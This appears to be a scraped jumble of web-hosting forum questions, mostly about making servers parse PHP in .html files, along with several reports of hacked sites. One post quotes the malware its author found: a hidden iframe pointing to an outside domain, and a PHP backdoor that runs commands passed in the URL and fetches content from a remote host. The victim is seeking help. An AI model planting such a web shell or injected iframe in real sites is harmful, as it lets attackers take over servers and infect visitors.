My webserver treat ALL files with html tags inside as html files, e.g. text files or EVEN files without extension.
How to only allow .htm, .html files?
I've deactivated temporary mime magic, I also tried with some RemoveHandler, AddType lines but nothing
I want to use php code in .html extension files. I tried to accomplish this through a .htaccess file, but that did not work out. I tried to add a handler through cpanel, but it does not parse the code in the .html file. I renamed the index file to index.php and works fine.
I would like to keep the .html extension.
I tried several Handlers through Cpanel which all failed to work.
Tried: AddHandler application/x-httpd-php .php .html and AddType application/x-httpd-php .php .html (with and without application/) and AddHandler server-parsed .html
Has anybody ever come across a server problem, where the file is visited (e.g. domain.com/sub/file.html or domain.com/sub/file2.php) it attempts to download the file automatically as apposed to displaying the page?
See image after I visited a page!
my friends server has something running that i couldn't find in cron or through access logs.. it is running comus and arrowtrader.. they're porn trading scripts.. anyway.
it's basically executing something at unknown times which i just started logging cause i temporarily moved "find" to /root and made /usr/bin/find echo me the output.. so it's running these:
---
find /etc
find /var
find /usr/local
find
find ./
find ../
find ../../
---
i can't find what is causing this.. i've disabled comus and arrowtrader but they still run, i can't find anything else running in the background that is causing this..
what i'd really like to know is how to make a wrapper for perl to log all commands.. or some kind of exec logging for freebsd, i've looked for a way to also log all commands run by PHP too but i can never find something like that. i've scanned the server, found the r57/rst type backdoors, removed... nothing is listening on a port, i just can't seem to find it, i've enabled accounting and see that find runs, grep runs too.. but can't see what is causing it..
we have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?
The problem:
On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.
Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.
On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.
We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.
What we have done to attempt to secure the server:
1) We have installed SuPhp.
2) We have ensured that all scripts on the affected websites are updated and running the latest versions.
3) We have changed all the passwords.
Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.
The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.
One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.
Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?
[url]
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
1. Are there any restrictions or special problems with hosting domains as a function of whether they are a ".com" versus a ".us" domain?
2. Are there any differences or problems when hosting domains which have index files which are htm versus html?
For these items, are there good sources for detailed explanations?
I want my server looking and open index.html first and after index.php, I mean if have both index.html and index.php in a folder, the index.html will be open by default .
I know it name: DirectoryIndex directive ..
PHP 5.2.5 / Apache 2.2 / suPHP enabled
index2.html shows "it works" but index.php does not, shows up blank ....
I have several websites running on Linux hosting with cPanel, that were developed as static .html files, where for ease of maintenance (use of includes) and future improvements I want the pages treated as .php. On one server I use, I just put:
AddHandler application/x-httpd-php .html .shtml
into the .htaccess file and the pages were treated as .php, exactly what I wanted.
The other sites are on a cPanel reseller account at iVhosting.com. When I tried this there, it didn't work. I tried some other ideas suggested by Google, which resulted in the .php files being downloaded as text files. I contacted iVhosting support, who stated: "you will not be able to do this on our server since we use phpsuexec/suphp for more security. PHP pages have to have .php extension."
So what can I do? I can't rename the pages all to .php because this would break incoming links and destroy the page's PR. Creating a permanent redirect for each page to the same name with .php extension would create a very large .htaccess and be extremely tedious to do.
Is there any way to run SSI with html instead of shtm or shtml in Windows 2003 IIS 6 server?
View 0 Replies View Relatedto open EML files on apache webserver, actually when I load an eml (outlook email message) by using an URL, it shows the email code, it is not pasing it correctly.
What libraries (apache or system) do I need installed to parse this kind of files?
Im using apache 2.0.6.3, php 5.2.6 and RHE 5.2
i was wondering if anyone no's of a html/php coder,and decoder via a password thats an offline app?
its just ive made a script and i want it to use liencekeys for activation so i would need to encryt the code some how,
does anyone no off a program that could do all of this for me?
Currently I cache php to html in a folder, and any time I upload index.php the whole site recaches. It also is set to a specific time such as 1 day, and the specific page will recache on someone hitting a page in 1 day from last cache.
The problem is when there are thousands of people on, and the index.php is uploaded the site crashes due to connections to the database, and possibly writing to the folder as well.
What is the best way to cache these files to html, and not have it crash every time I try to update things on the site. Also it needs to be something somewhat simple.
I have a curious problem, and have scoured the net for a solution.
Basically, while developing a Joomla site, I have had a standard .html holding page in place.
I uploaded the Joomla site in the 'background' to continue developing the website while the holding page was in place. I always thought that .html would always display first in the browser, before index.php.
However the index.php file always displays first. I've tried changing the htaccess file etc but at this point nothing seems to be working.
I know nothing about IIS as I ormally use Linux / Apache so I'm not sure this is possible.
I have built a site in PHP that the client now wants to move over to a IIS-hosted server. Although it's all in PHP because it was a re-build of an old static site I used ModRewrite to make all the page .html.
I know IIS doesn't have a URL rewrite feature as such. What I was wondering is, is it possible to configure IIS so that a PHP page can have a .html extension?
I run the website, [url]and am looking for a way to send newsletters to the members of the website.
There are currently over 53,000 registered members. We have tried emailing the database before using a variety of techniques but they are not all fool proof.
Is there any software you could recommend or would I have to use a 3rd party provider? If so, how much would this cost (to do a weekly or monthly mailshot).
The website is run on a core2duo E6750 with 4GB RAM and a 100mbps port - is this high end enough to support e-mailing this quantity of messages?
I've just set up HTTPS on Apache (CentOS). However if I try to access the HTTPS site I just get prompted with the save as dialog to download either the .php file or .html. How do I get it to show (and process) it instead, like when accessing normally (non-ssl).
View 7 Replies View RelatedHas anyone encountered server being infected with Exploit.HTML.IESlice.bz
My server is infected with this new rootkit. Is the 'OS reload' only the solution?
in many sites in my server torjan in index.html
in <ifram>
how to save my server from that .js torjan
and i need to ask about other thing this torjan can chang any this in backups
This software is by AntsSoft
"HTMLProtector is a tool that helps you protect the content of your web page by preventing others from viewing your source code. "
Is anyone familiar or has had any experience with this.
Is there a way to construct an HTML request so that only HTML text is returned (without images or rich media)? I assume search engines do this - how?
What I'm trying to do is write an Apache module that will retrieve only text from a web site. The idea is to provide a Lynx-like experience, using Apache as a proxy between my workstation and my ISP.
How can we make PhP run on html pages?
View 5 Replies View RelatedI have a server running PLESK 8.2 (latest version). With PHP4 and 5 support. I want to include .php files into .html (which work fine on LINUX CPANEL but on on WINDOWS PLESK).
Please can anyone suggest how can i make my WINDOWS server work so that it includes .php into .html. (.php included in .php works fine).
ALSO i tried to add (application/x-httpd-php in IIS MIME TYPES to extension .html and even .php but it did not work.)
I currently have a web site with an index.html file inside the Document Root. I also have the noindex.html inside the /var/www/error directory. From time to time for some reason the noindex.html shows when going to the web site even if I have the index.html file inside the Root Document.
View 5 Replies View RelatedMy server is running Red Hat Linux 9 , without PHP only Html and Cgi websites
are running on it.
Is there any Mail Header Patch for Html,CGi.
Some one is sending Spam email from my Server.
Apr 1 04:03:30 iris2 sendmail[15752]: l318soT3015742: to=<dedev@magna-tel.net>, ctladdr=<apache@hostname> (48/48), delay=00:08:35, xdelay=00:00:01, mailer=esmtp, pri=3000357, relay=magna-tel.net. [68.112.42.50], dsn=2.0.0, stat=Sent (4487747 message accepted for delivery)
I am unable to find that script or source which send email from my Server
because at SENDMAIL LOG it shows only sender address "apache@hostname".
Is there any MAIL HEADER PATCH Like PHP, so i will catch that Script or source.
this isn't my server, so I don't have a lot of information about it, other than it's a Linux/Apache Dedicated server at EV1. (cPanel/WHM)
There are other sites on the server, and they are running fine.
One site has a terrible lag. It takes about 10 seconds to serve up a static HTML file..
Now, it's not like the server is slow. It's like this: You request a small HTML file. The site sits and thinks about it for about 10 seconds, and then after that everything processes quickly.
The forum on the site is the same way. Everything you click on works fine and loads quickly after that initial delay passes.
Is there a common configuration problem that might be causing this?
If you want to see this phenomenon, here are a few test files:
[url]
[url]
[url]
[url]
I'm building website for big number of visitors and I'd like to know what is the best way to do such a website.
1. PHP/MySQL. Pages are created by query (on the fly).
2. HTML. Pages created and placed on server's HDD as plain .html files.
3. SHTML. Pages are created by query (on the fly), but from 3 HTML parts (one header for all files, unique body, one bottom for all files). So, I can save some HDD space.
I'm looking for some kind of benchmark. I'd like to know what is CPU load and memory usage difference between this methods.
I using RHES 4 + cPanel.
I have MySQL 5.x, and PHP 4.4.6.
I noticed that all sites on the server, can not parse php files, tried restarting httpd, recompiling using apache update or easyapache script, and the problem stills.
index.php is at DirectoryIndex, also Addtype shows php extension active at httpd.conf.
but, when I type "php -v" from the shell, i got this message:
Code:
php: /usr/lib/libmysqlclient.so.14: version `libmysqlclient_14' not found (required by php)
I found someone with the same problem, tested the solution posted there but it doesnt seems to solve this issue.
I am new here. I have a leased web server and I am getting new pages called "postinfo.html" on every domain along with some javascript code (virus) attached at the end of every webpage on every domain. Does anyone know about this or how to get rid of it and prevent it? I have a sneaky suspicion that it is from a phpbb forum.
View 6 Replies View RelatedI am not that technically proficient so I have to resort to shared hosting solutions...I am currently with Bluehost.
Problem: I have a small site with minimal needs in terms of storage and bandwidth, but the site is controversial and gets hacked and attacked a lot.
I need a shared hosting provider which ranks higher than most in terms of security.
Recently the site was attacked such that any user going to the site was infected with Trojan horse viruses.
Donno if it's useful or not but here are the files from my PC antivirus which was infected when I went to the site with IE:
File generated by Rogers Online Protection Anti-Virus
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5PG8E0SM0gifimg[1].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:25 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5GC9JZWI3gifimg[2].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:27 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5QBPA1ELgifimg[1].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:27 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE56SLECSUQgifimg[5].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:28 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5EKTEAS82gifimg[5].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:28 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5P5098OY4gifimg[4].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:29 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE5IPGNWAB0gifimg[1].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:30 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE55VT8B104gifimg[1].htm Trojan-Clicker.HTML.IFrame.amh
Deleted 11/5/2009 12:21:30 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE543XUDX83gifimg[2].htm Trojan-Clicker.HTML.IFrame.amh
Quarantined 11/5/2009 12:21:31 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet
FilesContent.IE56SLECSUQgifimg[5].htm Trojan-Clicker.HTML.IFrame.amh
Quarantined 11/5/2009 12:22:18 AM
C:Documents and SettingsuserLocal SettingsTemporary Internet